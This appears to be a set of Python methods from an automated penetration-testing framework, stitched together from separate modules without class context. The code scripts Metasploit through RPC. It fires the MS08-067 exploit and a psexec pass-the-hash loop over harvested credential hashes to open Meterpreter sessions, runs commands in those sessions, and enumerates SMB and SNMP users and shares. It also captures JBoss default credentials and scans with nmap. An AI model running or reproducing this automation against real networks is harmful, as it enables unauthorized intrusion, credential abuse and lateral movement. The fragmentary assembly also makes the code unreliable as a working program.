def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.execute("getuid\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.execute("sysinfo\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def processIPs(self, vector): for host in self.nm.all_hosts(): # print host kb.add('host/' + host) # fire new event for "newHost" EventHandler.fire("newIP" + ":" + vector) # process ports self.processPorts(host, vector) # process hostscripts if ("hostscript" in self.nm[host]): self.processHostScripts(host, vector) return
def processPorts(self, host, vector): for proto in self.nm[host].all_protocols(): lport = list(self.nm[host][proto].keys()) lport.sort() for port in lport: if (self.nm[host][proto][port]["state"] == "open"): # fire event for "newPortXXX" kb.add('host/' + host + '/' + proto + 'port/' + str(port)) # print 'host/' + host + '/' + proto + 'port/' + str(port) EventHandler.fire("newPort" + str(port) + ":" + vector) # process services and info self.processService(host, port, proto, vector) return
def processHost(self, host): ip = "" for addr in host.findall('address'): ip_tmp = addr.attrib['addr'] addrType = addr.attrib['addrtype'] if addrType == "ipv4": ip = ip_tmp kb.add('host/' + ip) EventHandler.fire("newIP" + ":" + self.vector) if host.find('hostname'): for hostname in host.find('hostnames').findall('hostname'): name = hostname.attrib['name'] kb.add('host/' + ip + '/dns/' + name) return ip
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = self.getUsers(t) for user in users: hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t+user+passhash): # add the new IP to the already seen list self.addseentarget(t+user+passhash) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("shell/" + t + "/msf/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("share/smb/" + t + "/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/ms08_067_netapi\n") msf.execute("set TARGET 0\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBPIPE BROWSER\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString") for comString in comStrings: msf.execute("use auxiliary/scanner/snmp/snmp_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("host/" + t + "/user/" + username.strip()) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t+p): # add the new IP to the already seen list self.addseentarget(t+p) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/http/jboss_vulnscan\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" )) for line in result.splitlines(): m = re.match(r'.*Authenticated using (.*):(.*)', line) if (m): self.display.error("Jboss on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() +"]/[" + m.group(2).strip() + "]") kb.add("creds/service/jboss/" + t + "/port/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newJbossPassword") # clean up after ourselves result = msf.cleanup() return
def myProcessHostScript(self, host, script, outfile): outfile = outfile + ".xml" scriptid = script.attrib['id'] output = script.attrib['output'] if (scriptid == "smb-enum-shares"): for volumes in script.findall("table"): for volume in volumes: readAccess = False writeAccess = False sharename = "" sharetype = "" sharecomment = "" anonaccess = "" useraccess = "" files = {} sharename = volume.attrib["key"] for elem in volume: if elem.attrib["key"] == "Type": sharetype = elem.text.replace("/", "%2F") if elem.attrib["key"] == "Comment": sharecomment = elem.text.replace("/", "%2F") elif elem.attrib["key"] == "Anonymous access": rights = elem[0].text if "READ" in rights: readAccess = True if "WRITE" in rights: writeAccess = True anonaccess = rights.replace("/", "%2F") elif elem.attrib["key"] == "Current user access": rights = elem[0].text if "READ" in rights: readAccess = True if "WRITE" in rights: writeAccess = True useraccess = rights.replace("/", "%2F") kb.add("share/smb/" + sharename + "/" + host + "/" + str("Info: " + anonaccess)) if readAccess: self.addVuln(host, "smb-read", {"port": "445", "output": outfile.replace("/", "%2F")}) self.fire("nfsRead") if writeAccess: self.addVuln(host, "smb-write", {"port": "445", "output": outfile.replace("/", "%2F")}) self.fire("nfsWrite")
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) temp_file = self.config["proofsDir"] + Utils.getRandStr(10) # run nmap n = mynmap(self.config, self.diaplay) scan_results = n.run(target=t, flags="-sS -A", vector=self.vector)['scan'] # loop over scan results and do anything you need # fire any new triggers that are needed # self.fire("TEST123") for host in scan_results.keys(): # loop over each proto and process it for proto in ['tcp', 'udp']: if (proto in scan_results[host]): # loop over each proto and process it for port in scan_results[host][proto].keys(): # only worry about open ports if (scan_results[host][proto][port]["state"] == "open"): # fire event for "newPortXXX" self.fire("newPort" + str(port)) kb.add('host/' + host + '/' + proto + 'port', port) # process services and info s = scan_results[host][proto][port] # print "%s - %i/%s (%s) \"%s %s\" [%s]" % (host, port, proto, s['name'], # s['product'], s['version'], s['extrainfo']) if (s['name'] == 'http') or (s['name'] == 'https'): self.fire('web') # check for any scripts and loop over them if ('script' in scan_results[host][proto][port].keys()): for script in scan_results[host][proto][port]['script'].keys(): a = 1 # print " %s - [[%s]]" % (script, scan_results[host][proto][port][ # 'script'][script]) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for community in cstrings: command = self.config["snmpwalk"] + " -v 2c -c " + community + " " + t result = command + "\n" + Utils.execWait(command) #append command to top of output outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F")) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get('service/ftp/' + t + '/tcp') for p in ports: self.testTarget(t, p) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) try: results = socket.gethostbyaddr(t) self.fire("newHostname") kb.add('host/' + t + '/hostname/' + results[0]) except: pass return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # run nmap n = mynmap(self.config, self.display) scan_results = n.run(target=t, flags="--script=nfs-ls,nfs-showmount", ports="111", vector=self.vector, filetag=t + "_NFSSHARESCAN")['scan'] tree = ET.parse(n.outfile + '.xml') root = tree.getroot() for volumestable in root.iter("table"): if volumestable.attrib.has_key('key') and volumestable.attrib['key'] == "volumes": for volume in volumestable: sharename = "" shareinfo = "" files = {} for elem in volume: if elem.attrib["key"] == "volume": sharename = elem.text.replace("/", "%2F") if elem.attrib["key"] == "info": shareinfo = elem[0].text.replace("/", "%2F") if elem.attrib["key"] == "files": for file in elem: newfile = {} for fileprop in file: newfile[fileprop.attrib["key"]] = fileprop.text files[newfile["filename"]] = newfile kb.add("host/" + t + "/shares/NFS/" + sharename + "/" + str("Info: " + shareinfo)) for file in files: # TODO - Maybe revisit adding more file properties here in addition to names kb.add("host/" + t + "/shares/NFS/" + sharename + "/Files/" + str(file).replace("/", "%2F")) return
def myProcessPortScript(self, host, proto, port, script, outfile): outfile = outfile + ".xml" scriptid = script.attrib['id'] output = script.attrib['output'] if (scriptid == "nfs-ls"): readAccess = False writeAccess = False for volumes in script.findall("table"): for volume in volumes.findall("table"): sharename = "" shareinfo = "" files = {} for elem in volume: if elem.attrib["key"] == "volume": sharename = elem.text.replace("/", "%2F") if elem.attrib["key"] == "info": rights = elem[0].text if "Read" in rights: readAccess = True if "Modify" in rights: writeAccess = True shareinfo = rights.replace("/", "%2F") if elem.attrib["key"] == "files": for file in elem: newfile = {} for fileprop in file: newfile[fileprop.attrib["key"]] = fileprop.text files[newfile["filename"]] = newfile kb.add("share/nfs/" + host + "/" + sharename + "/" + str("Info: " + shareinfo)) # for file in files: # # TODO - Maybe revisit adding more file properties here in addition to names # kb.add("host/" + host + "/shares/NFS/" + sharename + "/Files/" + str(file).replace("/", "%2F")) # print ("host/" + host + "/shares/NFS/" + sharename + "/Files/" + str(file).replace("/", "%2F")) if readAccess: self.addVuln(host, "nfs-read", {"port": "111", "output": outfile.replace("/", "%2F")}) self.fire("nfsRead") if writeAccess: self.addVuln(host, "nfs-write", {"port": "111", "output": outfile.replace("/", "%2F")}) self.fire("nfsWrite")
def processTarget(self, t, port): if not self.seentarget(t + str(port)): self.addseentarget(t + str(port)) self.display.verbose(self.shortName + " - Connecting to " + t) try: conn = httplib.HTTPConnection(t, port, timeout=10) conn.request('GET', '/') response = conn.getresponse() serverver = response.getheader('server') if (serverver): outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) Utils.writeFile("Identified Server Version of %s : %s\n\nFull Headers:\n%s" % ( t, serverver, self.print_dict(response.getheaders())), outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) except httplib.BadStatusLine: pass # except socket.error as e: except: pass
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/smb/smb_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("run\n") # msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() # TODO - process results and store user list to KB # need to do something better with this. # loop over each user and store in the KB # if local, store in "/host/" + t + "/user/" + user # if domain, store in "/domain/" + domainname + "/user/" + user # for now, just print out the results # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras) parts = re.findall(".*" + t.replace(".", "\.") + ".*", result) for part in parts: if "RHOSTS" in part: pass else: try: pieces = part.split() domain = pieces[3] kb.add("domain/" + domain.strip() + "/host/" + t) extras = part.split('(')[1].split(')')[0] users = part.split('[')[3].split(']')[0].split(',') for user in users: kb.add("host/" + t + "/user/" + user.strip()) except: pass outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return